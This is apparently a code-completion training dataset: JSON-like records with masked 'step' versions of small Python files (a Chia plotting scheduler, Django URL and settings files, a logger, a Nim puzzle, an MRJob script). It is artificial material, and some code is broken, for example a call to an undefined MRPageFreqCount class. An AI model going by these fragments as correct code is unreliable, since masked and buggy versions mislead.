fetch_logs()\n cores_used = count_used_cores(log_list)\n while numberOfLogicalCores > cores_used + 1:\n print('There are four cores free, adding new plot!')\n add_plot()\n time.sleep(refresh_logs_interval)\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n\n\ndef add_plot():\n command = (\n f'{chia_executable} plots create -k 32 -b 3724 -n 1 -r4 -t /srv/chia/plots/ -2 /srv/chia/plots/ -d /mnt/chia/plots &'\n )\n unique_filename = str(uuid.uuid4())\n new_log_file_path = (\n f'{logs_location}/{unique_filename}{string_contained_in_all_logs}')\n with open(new_log_file_path, 'w') as file:\n subprocess.run(command, shell=True, stdout=file)\n\n\ndef run_loop():\n while True:\n use_all_cores()\n time.sleep(run_loop_interval)\n\n\nrun_loop()\n",
"step-5": "import os\nimport time\nimport uuid\nimport subprocess\n\n# Global variables. ADJUST THEM TO YOUR NEEDS\nchia_executable = os.path.expanduser('~')+\"/chia-blockchain/venv/bin/chia\" # directory of chia binary file\nnumberOfLogicalCores = 16 # number of logical cores that you want to use overall\nrun_loop_interval = 10 # seconds of delay before this algorithm executes another loop\nrefresh_logs_interval = 10 # seconds of delay before this algorithm will try to re-read all logs after adding plot\nlogs_location = os.path.expanduser('~')+\"/.chia/mainnet/plotter/\" # location of the log files. Remove all corrupted and interrupted log files!\nstring_contained_in_all_logs = \".txt\" # shared part of the name of all the log files (all logfiles must have it!)\nphase_one_finished = \"Time for phase 1 =\" # part of the log file that means 1/2 core should be freed\nphase_four_finished = \"Time for phase 4 =\" # part of the log file that means 2/2 core should be freed\ntemporary_directory = \"/srv/chia/plots/\" # plotting final destination\nfinal_directory = \"/mnt/chia/plots/\" # plotting directory\nfarmer_public_key = \"8536d991e929298b79570ad16ee1150d3905121a44251eda3740f550fcb4285578a2a22448a406c5e73c2e9d77cd7eb2\" # change to your key\npool_public_key = \"907f125022f2b5bf75ea5ef1f108b0c9110931891a043f421837ba6edcaa976920c5b2c5ba8ffdfb00c0bd71e7b5a2b1\" # change to your key\n\n\n# Functions\ndef fetch_file_content(file_path):\n if not os.path.isfile(file_path):\n print('File does not exist.')\n else:\n with open(file_path) as file:\n return file.readlines()\n\n\ndef fetch_logs():\n item_in_location_list = os.listdir(logs_location)\n content_path_list = list(map(lambda log: logs_location + log, item_in_location_list))\n text_file_list = list(filter(lambda path: string_contained_in_all_logs in path, content_path_list))\n logs_content = list(map(fetch_file_content, text_file_list))\n return logs_content\n\n\ndef count_used_cores(logs):\n print(\"===START COUNTING===\")\n used_cores_counter = 0\n for (index, log) in enumerate(logs):\n print(f\"Starting log #{index}\")\n print(\"Potentially it's still in phase one assigning 4 cores\")\n used_cores_counter += 4\n for line in log:\n if phase_one_finished in line:\n print(\"Phase one was finished in the log, deallocating two cores\")\n used_cores_counter -= 2\n if phase_four_finished in line:\n print(\"Phase four was finished in the log, deallocating two cores\")\n used_cores_counter -= 2\n print(f\"===FINISH COUNTING: {used_cores_counter} USED CORES===\")\n return used_cores_counter\n\n\ndef use_all_cores():\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n while numberOfLogicalCores > cores_used +1:\n print(\"There are four cores free, adding new plot!\")\n add_plot()\n time.sleep(refresh_logs_interval)\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n\n\ndef add_plot():\n command = f\"{chia_executable} plots create -k 32 -b 3724 -n 1 -r4 -t /srv/chia/plots/ -2 /srv/chia/plots/ -d /mnt/chia/plots &\"\n unique_filename = str(uuid.uuid4())\n new_log_file_path = f\"{logs_location}/{unique_filename}{string_contained_in_all_logs}\"\n with open(new_log_file_path, \"w\") as file:\n subprocess.run(command, shell=True, stdout=file)\n\n\ndef run_loop():\n while True:\n use_all_cores()\n time.sleep(run_loop_interval)\n\n\n# Entry point\nrun_loop()\n",
"step-ids": [
4,
6,
8,
9,
10
]
}
|
[
4,
6,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [url('^$', TemplateView.as_view(template_name=
'visitor/landing-index.html'), name='landing_index'), url('^about$',
TemplateView.as_view(template_name='visitor/landing-about.html'), name=
'landing_about'), url('^terms/$', TemplateView.as_view(template_name=
'visitor/terms.html'), name='website_terms'), url('^contact$',
TemplateView.as_view(template_name='visitor/contact.html'), name=
'website_contact'), url('^accounts/', include('allauth.urls')), url(
'^accounts/profile/$', account_profile, name='account_profile'), url(
'^member/$', member_index, name='user_home'), url('^member/action$',
member_action, name='user_action'), url('^admin/', admin.site.urls)
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
from django.conf.urls.static import static
from django.conf import settings
from .auth.views import account_profile
from .views import member_index, member_action
urlpatterns = [url('^$', TemplateView.as_view(template_name=
'visitor/landing-index.html'), name='landing_index'), url('^about$',
TemplateView.as_view(template_name='visitor/landing-about.html'), name=
'landing_about'), url('^terms/$', TemplateView.as_view(template_name=
'visitor/terms.html'), name='website_terms'), url('^contact$',
TemplateView.as_view(template_name='visitor/contact.html'), name=
'website_contact'), url('^accounts/', include('allauth.urls')), url(
'^accounts/profile/$', account_profile, name='account_profile'), url(
'^member/$', member_index, name='user_home'), url('^member/action$',
member_action, name='user_action'), url('^admin/', admin.site.urls)
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
<|reserved_special_token_1|>
"""URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
from django.conf.urls.static import static
from django.conf import settings
from .auth.views import account_profile
from .views import member_index, member_action
urlpatterns = [
# Landing page area
url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),
url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),
url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),
url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),
# Account management is done by allauth
url(r'^accounts/', include('allauth.urls')),
# Account profile and member info done locally
url(r'^accounts/profile/$', account_profile, name='account_profile'),
url(r'^member/$', member_index, name='user_home'),
url(r'^member/action$', member_action, name='user_action'),
# Usual Django admin
url(r'^admin/', admin.site.urls),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
flexible
|
{
"blob_id": "312a95c9514722157653365104d8cd0ada760ce8",
"index": 8084,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-3": "<mask token>\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom .auth.views import account_profile\nfrom .views import member_index, member_action\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-4": "\"\"\"URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.conf.urls import url, include\r\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.conf.urls import include, url\r\nfrom django.contrib import admin\r\nfrom django.views.generic import TemplateView\r\nfrom django.conf.urls.static import static\r\nfrom django.conf import settings\r\n\r\nfrom .auth.views import account_profile\r\nfrom .views import member_index, member_action\r\n\r\nurlpatterns = [\r\n # Landing page area\r\n url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),\r\n url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),\r\n url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),\r\n url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),\r\n\r\n # Account management is done by allauth\r\n url(r'^accounts/', include('allauth.urls')),\r\n\r\n # Account profile and member info done locally\r\n url(r'^accounts/profile/$', account_profile, name='account_profile'),\r\n url(r'^member/$', member_index, name='user_home'),\r\n url(r'^member/action$', member_action, name='user_action'),\r\n\r\n # Usual Django admin\r\n url(r'^admin/', admin.site.urls),\r\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import logging
loggers = {}
def create_logger(
log_level:str ='INFO',
log_name:str = 'logfile',
export_log: bool = True,
save_dir:str = ''):
if log_name in loggers.keys():
logger = loggers.get(log_name)
else:
# create logger
logger = logging.getLogger(log_name)
logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
handler1 = logging.StreamHandler()
handler1.setLevel(log_level)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
handler1.setFormatter(formatter)
# add ch to logger
logger.addHandler(handler1)
if export_log:
pathname = log_name
if len(save_dir)>0:
pathname = f'{save_dir}/{pathname}'
handler2 = logging.FileHandler(filename=f'{pathname}.log', mode='w')
handler2.setLevel('DEBUG')
handler2.setFormatter(formatter)
logger.addHandler(handler2)
loggers[log_name] = logger
return logger
|
normal
|
{
"blob_id": "3146775c466368c25c92bd6074abb97408533500",
"index": 2956,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_logger(log_level: str='INFO', log_name: str='logfile',\n export_log: bool=True, save_dir: str=''):\n if log_name in loggers.keys():\n logger = loggers.get(log_name)\n else:\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.DEBUG)\n handler1 = logging.StreamHandler()\n handler1.setLevel(log_level)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler1.setFormatter(formatter)\n logger.addHandler(handler1)\n if export_log:\n pathname = log_name\n if len(save_dir) > 0:\n pathname = f'{save_dir}/{pathname}'\n handler2 = logging.FileHandler(filename=f'{pathname}.log', mode='w'\n )\n handler2.setLevel('DEBUG')\n handler2.setFormatter(formatter)\n logger.addHandler(handler2)\n loggers[log_name] = logger\n return logger\n",
"step-3": "<mask token>\nloggers = {}\n\n\ndef create_logger(log_level: str='INFO', log_name: str='logfile',\n export_log: bool=True, save_dir: str=''):\n if log_name in loggers.keys():\n logger = loggers.get(log_name)\n else:\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.DEBUG)\n handler1 = logging.StreamHandler()\n handler1.setLevel(log_level)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler1.setFormatter(formatter)\n logger.addHandler(handler1)\n if export_log:\n pathname = log_name\n if len(save_dir) > 0:\n pathname = f'{save_dir}/{pathname}'\n handler2 = logging.FileHandler(filename=f'{pathname}.log', mode='w'\n )\n handler2.setLevel('DEBUG')\n handler2.setFormatter(formatter)\n logger.addHandler(handler2)\n loggers[log_name] = logger\n return logger\n",
"step-4": "import logging\nloggers = {}\n\n\ndef create_logger(log_level: str='INFO', log_name: str='logfile',\n export_log: bool=True, save_dir: str=''):\n if log_name in loggers.keys():\n logger = loggers.get(log_name)\n else:\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.DEBUG)\n handler1 = logging.StreamHandler()\n handler1.setLevel(log_level)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler1.setFormatter(formatter)\n logger.addHandler(handler1)\n if export_log:\n pathname = log_name\n if len(save_dir) > 0:\n pathname = f'{save_dir}/{pathname}'\n handler2 = logging.FileHandler(filename=f'{pathname}.log', mode='w'\n )\n handler2.setLevel('DEBUG')\n handler2.setFormatter(formatter)\n logger.addHandler(handler2)\n loggers[log_name] = logger\n return logger\n",
"step-5": "import logging\n\nloggers = {} \n\ndef create_logger(\n log_level:str ='INFO', \n log_name:str = 'logfile',\n export_log: bool = True,\n save_dir:str = ''):\n if log_name in loggers.keys():\n logger = loggers.get(log_name)\n else:\n # create logger\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.DEBUG)\n\n # create console handler and set level to debug\n handler1 = logging.StreamHandler()\n handler1.setLevel(log_level)\n\n # create formatter\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n # add formatter to ch\n handler1.setFormatter(formatter)\n\n # add ch to logger\n logger.addHandler(handler1)\n\n if export_log:\n pathname = log_name\n if len(save_dir)>0:\n pathname = f'{save_dir}/{pathname}'\n\n handler2 = logging.FileHandler(filename=f'{pathname}.log', mode='w')\n handler2.setLevel('DEBUG')\n handler2.setFormatter(formatter)\n logger.addHandler(handler2)\n \n loggers[log_name] = logger\n \n return logger\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from app.routes import home
from .home import bp as home
from .dashboard import bp as dashboard
|
flexible
|
{
"blob_id": "358a4948ac1f60e0966328cebf401777042c3d0e",
"index": 5239,
"step-1": "<mask token>\n",
"step-2": "from app.routes import home\nfrom .home import bp as home\nfrom .dashboard import bp as dashboard\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
class Solution(object):
def canWinNim(self, n):
"""
:type n: int
:rtype: bool
"""
if(n % 4 != 0):
return True;
return False;
"""main():
sol = Solution();
sol.canWinNim(4);
"""
|
normal
|
{
"blob_id": "9a539fd3ce4e3ff75af82407150ab4b550b255c1",
"index": 3284,
"step-1": "class Solution(object):\n def canWinNim(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n\tif(n % 4 != 0):\n\t\treturn True;\n\treturn False;\n\"\"\"main():\n\tsol = Solution();\n\tsol.canWinNim(4);\n\"\"\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from plprofiler_tool import main
from plprofiler import plprofiler
|
normal
|
{
"blob_id": "6b616f5ee0a301b76ad3f7284b47f225a694d33c",
"index": 1281,
"step-1": "<mask token>\n",
"step-2": "from plprofiler_tool import main\nfrom plprofiler import plprofiler\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
#-*- coding:utf-8 -*-
"""
Django settings for hehotel project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(__file__)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '6@j!6%foulnrume$wc7i5cwc2ppf6hcxoa&xh_vtanfy_rc@yc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True #结束开发状态应该切为False
EXCEPTION_INGORE_AJAX = True #异常信息即便是ajax请求也直接返回Html页面
TEMPLATE_DEBUG = True
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
RESOURCE_ROOT_PATH = os.path.join(BASE_DIR, 'templates').replace('\\','/')
#STATIC_ROOT_PATH = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'templates\static').replace('\\','/')
STATIC_ROOT_PATH = os.path.join(BASE_DIR, 'static').replace('\\','/')
ALLOWED_HOSTS = []
# Application definition
SITE_ID = 1
AUTH_USER_MODEL = 'member.User'
INSTALLED_APPS = (
'apps.member',
'django.contrib.admin',
'libs.djex.autodocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.flatpages',
'hehotel',
'apps.room',
'apps.order',
'apps.article',
)
MIDDLEWARE_CLASSES = (
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
#'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'urls'
WSGI_APPLICATION = 'wsgi.application'
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(os.path.join(BASE_DIR, 'data'), 'db.sqlite3'),
},
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'zh_CN'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/__static__/'
SHOW_SQL = True#是否在console窗口显示sql语句
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'file': {
'level': 'INFO',
'class': 'logging.FileHandler',
#'formatter': 'simple',
'filename': os.path.join(os.path.dirname(__file__), 'logs/auto.log'),
'mode': 'a',
}
},
'loggers': {
'log':{
'handlers': ['file'],
#'filters': ['special'],
'level': 'INFO',
'propagate': True
}
}
}
|
normal
|
{
"blob_id": "045ad27f46c2090ed39a49144c3aa17093b0d9c7",
"index": 7094,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nBASE_DIR = os.path.dirname(__file__)\nSECRET_KEY = '6@j!6%foulnrume$wc7i5cwc2ppf6hcxoa&xh_vtanfy_rc@yc'\nDEBUG = True\nEXCEPTION_INGORE_AJAX = True\nTEMPLATE_DEBUG = True\nTEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]\nRESOURCE_ROOT_PATH = os.path.join(BASE_DIR, 'templates').replace('\\\\', '/')\nSTATIC_ROOT_PATH = os.path.join(BASE_DIR, 'static').replace('\\\\', '/')\nALLOWED_HOSTS = []\nSITE_ID = 1\nAUTH_USER_MODEL = 'member.User'\nINSTALLED_APPS = ('apps.member', 'django.contrib.admin',\n 'libs.djex.autodocs', 'django.contrib.auth',\n 'django.contrib.contenttypes', 'django.contrib.sessions',\n 'django.contrib.messages', 'django.contrib.staticfiles',\n 'django.contrib.sites', 'django.contrib.flatpages', 'hehotel',\n 'apps.room', 'apps.order', 'apps.article')\nMIDDLEWARE_CLASSES = (\n 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware')\nROOT_URLCONF = 'urls'\nWSGI_APPLICATION = 'wsgi.application'\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\nDATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3', 'NAME': os\n .path.join(os.path.join(BASE_DIR, 'data'), 'db.sqlite3')}}\nLANGUAGE_CODE = 'zh_CN'\nTIME_ZONE = 'Asia/Shanghai'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_URL = '/__static__/'\nSHOW_SQL = True\nLOGGING = {'version': 1, 'disable_existing_loggers': False, 'handlers': {\n 'file': {'level': 'INFO', 'class': 'logging.FileHandler', 'filename':\n os.path.join(os.path.dirname(__file__), 'logs/auto.log'), 'mode': 'a'}},\n 'loggers': {'log': {'handlers': ['file'], 'level': 'INFO', 'propagate':\n True}}}\n",
"step-3": "<mask token>\nimport os\nBASE_DIR = os.path.dirname(__file__)\nSECRET_KEY = '6@j!6%foulnrume$wc7i5cwc2ppf6hcxoa&xh_vtanfy_rc@yc'\nDEBUG = True\nEXCEPTION_INGORE_AJAX = True\nTEMPLATE_DEBUG = True\nTEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]\nRESOURCE_ROOT_PATH = os.path.join(BASE_DIR, 'templates').replace('\\\\', '/')\nSTATIC_ROOT_PATH = os.path.join(BASE_DIR, 'static').replace('\\\\', '/')\nALLOWED_HOSTS = []\nSITE_ID = 1\nAUTH_USER_MODEL = 'member.User'\nINSTALLED_APPS = ('apps.member', 'django.contrib.admin',\n 'libs.djex.autodocs', 'django.contrib.auth',\n 'django.contrib.contenttypes', 'django.contrib.sessions',\n 'django.contrib.messages', 'django.contrib.staticfiles',\n 'django.contrib.sites', 'django.contrib.flatpages', 'hehotel',\n 'apps.room', 'apps.order', 'apps.article')\nMIDDLEWARE_CLASSES = (\n 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware')\nROOT_URLCONF = 'urls'\nWSGI_APPLICATION = 'wsgi.application'\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\nDATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3', 'NAME': os\n .path.join(os.path.join(BASE_DIR, 'data'), 'db.sqlite3')}}\nLANGUAGE_CODE = 'zh_CN'\nTIME_ZONE = 'Asia/Shanghai'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_URL = '/__static__/'\nSHOW_SQL = True\nLOGGING = {'version': 1, 'disable_existing_loggers': False, 'handlers': {\n 'file': {'level': 'INFO', 'class': 'logging.FileHandler', 'filename':\n os.path.join(os.path.dirname(__file__), 'logs/auto.log'), 'mode': 'a'}},\n 'loggers': {'log': {'handlers': ['file'], 'level': 'INFO', 'propagate':\n True}}}\n",
"step-4": "#-*- coding:utf-8 -*-\n\"\"\"\nDjango settings for hehotel project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(__file__)\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '6@j!6%foulnrume$wc7i5cwc2ppf6hcxoa&xh_vtanfy_rc@yc'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True #结束开发状态应该切为False\nEXCEPTION_INGORE_AJAX = True #异常信息即便是ajax请求也直接返回Html页面\n\nTEMPLATE_DEBUG = True\nTEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]\nRESOURCE_ROOT_PATH = os.path.join(BASE_DIR, 'templates').replace('\\\\','/')\n#STATIC_ROOT_PATH = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'templates\\static').replace('\\\\','/')\nSTATIC_ROOT_PATH = os.path.join(BASE_DIR, 'static').replace('\\\\','/')\n\nALLOWED_HOSTS = []\n\n# Application definition\nSITE_ID = 1\n\nAUTH_USER_MODEL = 'member.User'\n\nINSTALLED_APPS = (\n 'apps.member',\n 'django.contrib.admin',\n 'libs.djex.autodocs',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'django.contrib.flatpages',\n 'hehotel',\n 'apps.room',\n 'apps.order',\n 'apps.article',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n #'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nWSGI_APPLICATION = 'wsgi.application'\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(os.path.join(BASE_DIR, 'data'), 'db.sqlite3'),\n },\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'zh_CN'\n\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/__static__/'\n\nSHOW_SQL = True#是否在console窗口显示sql语句\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'file': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n #'formatter': 'simple',\n 'filename': os.path.join(os.path.dirname(__file__), 'logs/auto.log'),\n 'mode': 'a',\n }\n },\n 'loggers': {\n 'log':{\n 'handlers': ['file'],\n #'filters': ['special'],\n 'level': 'INFO',\n 'propagate': True\n } \n }\n}\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from mrjob.job import MRJob
from mrjob.step import MRStep
from collections import Counter
import csv
def read_csvLine(line):
# Given a comma delimited string, return fields
for row in csv.reader([line]):
return row
class MRTopVisitorCount(MRJob):
# Mapper1: emit page_id, 1
def mapper_count(self, _, line):
fields = read_csvLine(line)
yield fields[1], (fields[4], 1)
# Reducer1: aggregate page_id
def reducer_count(self, page, counts):
count = Counter()
for visitor in counts:
count.update({visitor[0]:visitor[1]})
yield page, count
# Mapper2: invert page and counts to sort
def mapper_sort(self, page, counts):
top = Counter(counts).most_common(1)
yield page, (top[0][0], top[0][1])
# Reducer2: identity
def reducer_sort(self, page, visitor_count):
for v in visitor_count:
yield page, v
# Multi-step pipeline definition
def steps(self):
return [
MRStep(mapper=self.mapper_count,
reducer=self.reducer_count),
MRStep(mapper=self.mapper_sort,
reducer=self.reducer_sort)]
if __name__ == '__main__':
MRPageFreqCount.run()
|
normal
|
{
"blob_id": "471ce1eeb3293a424de74e25f36b76699a97ec2b",
"index": 7039,
"step-1": "<mask token>\n\n\nclass MRTopVisitorCount(MRJob):\n <mask token>\n <mask token>\n\n def mapper_sort(self, page, counts):\n top = Counter(counts).most_common(1)\n yield page, (top[0][0], top[0][1])\n\n def reducer_sort(self, page, visitor_count):\n for v in visitor_count:\n yield page, v\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MRTopVisitorCount(MRJob):\n\n def mapper_count(self, _, line):\n fields = read_csvLine(line)\n yield fields[1], (fields[4], 1)\n\n def reducer_count(self, page, counts):\n count = Counter()\n for visitor in counts:\n count.update({visitor[0]: visitor[1]})\n yield page, count\n\n def mapper_sort(self, page, counts):\n top = Counter(counts).most_common(1)\n yield page, (top[0][0], top[0][1])\n\n def reducer_sort(self, page, visitor_count):\n for v in visitor_count:\n yield page, v\n\n def steps(self):\n return [MRStep(mapper=self.mapper_count, reducer=self.reducer_count\n ), MRStep(mapper=self.mapper_sort, reducer=self.reducer_sort)]\n\n\n<mask token>\n",
